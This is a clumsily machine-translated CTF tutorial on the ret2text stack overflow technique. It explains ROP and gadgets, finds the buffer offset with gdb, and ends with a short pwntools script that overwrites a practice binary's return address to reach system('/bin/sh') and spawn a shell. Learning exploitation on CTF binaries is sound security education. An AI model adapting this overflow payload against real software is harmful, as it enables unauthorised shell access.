Learn PWN from CTF wiki - ret2text

Say something

The kidney is called never quitting , Is to be angry to death 10000 times a day , I don't quit …( Cry

Basic knowledge

ROP

Return Oriented Programming, The main idea is that Stack buffer overflow based on , Take advantage of the small pieces already in the program (gadgets) To change the values of some registers or variables , So as to control the execution process of the program .

General stack structure ：

       High address                                 +-----------------+
                                           |     retaddr     |
                                           +-----------------+
                                           |     saved ebp   |
                                    ebp--->+-----------------+
                                           |                 |
                                           |                 |
                                           |                 |
                                           |                 |
                                           |                 |
                                           |                 |
       Low address                           esp-->+-----------------+

Gadgets

With ret Ending instruction sequence , Through these instruction sequences , We can modify the contents of some addresses , It is convenient to control the execution process of the program .

ROP An attack usually has to satisfy the following conditions

 There is an overflow in the program , And you can control the return address .
 You can find something that meets the conditions  gadgets  And the corresponding  gadgets  The address of .

If gadgets Every time the address is not fixed , Then we need to find a way to dynamically obtain the corresponding address .

every last gadgets Both contain ret It is to enable the program to automatically and continuously select the instructions in the stack to execute in turn

ret The instruction can be understood as taking the data at the top of the stack as the position of the next jump . namely ,

eip = [esp];

esp = esp+4;

ret  modify eip  and  esp Value 

Or simply understood as ： pop eip; （pop The instruction will be appended with esp The movement of the , It means to take the data at the top of the stack as the next jump position ） And then execute jump

by comparison ,call The order is ：push eip;（ here eip by call The address of the next instruction of the instruction , It means that call The next instruction address of the instruction is pushed onto the stack ） then jump

The following instructions are usually executed when the function returns

mov esp ,ebp 
pop ebp   These two instructions make ebp , esp Point to the original stack , here esp Point to return address 
ret       send eip Change to return address , then jmp 

Configure tools ：IDA And GDB

ret2text

principle

ret2text That is, the control program executes the existing code of the program itself (.text). in other words , In the ELF Of .text There is code available in the code segment , If it exists system(“/bin/sh”) Code for .

ret2text

checksec see ：

no canary= You can simply stack overflow

ida see ：

You can enter 100 Bytes

gdb debugging ：

gdb ret2text
disas main
b *0x80486ae

r

lea eax,[esp+0x1c]  
mov DWORD PTR [esp], eax 
#  You can know that the starting address of the string is different from esp by +0x1c

Review the relationship between stack and address

So distance ebp The address is 0x88-0x1c = 0x6B

Then the return address is overwritten ：

                             +-----------------+
                             |     /bin/sh     |   primary ret Return to position 
                             +-----------------+
                             |      holk       |   primary saved ebp Location （4 byte ）
                      ebp--->+-----------------+
                             |                 |
                             |                 |
                             |                 |
                             |                 |
                             |                 |
                             |                 |
             s start ,ebp-0x6B-->+-----------------+

0x6B+4 = 112（ Decimal system ） Bytes .

You know the number of overflow characters , Next look for system(/bin/sh)

Stack overflow problem , With the overflow character amount , With system(/bin/sh) That is to complete the topic

structure payload

from pwn import * 
sh = process('./ret2text')
shell = 0x0804863A
payload = 'a'*112 + p32(shell) #112 Bytes fill the stack space to ret+shell_add
sh.sendline(payload)
sh.interactive()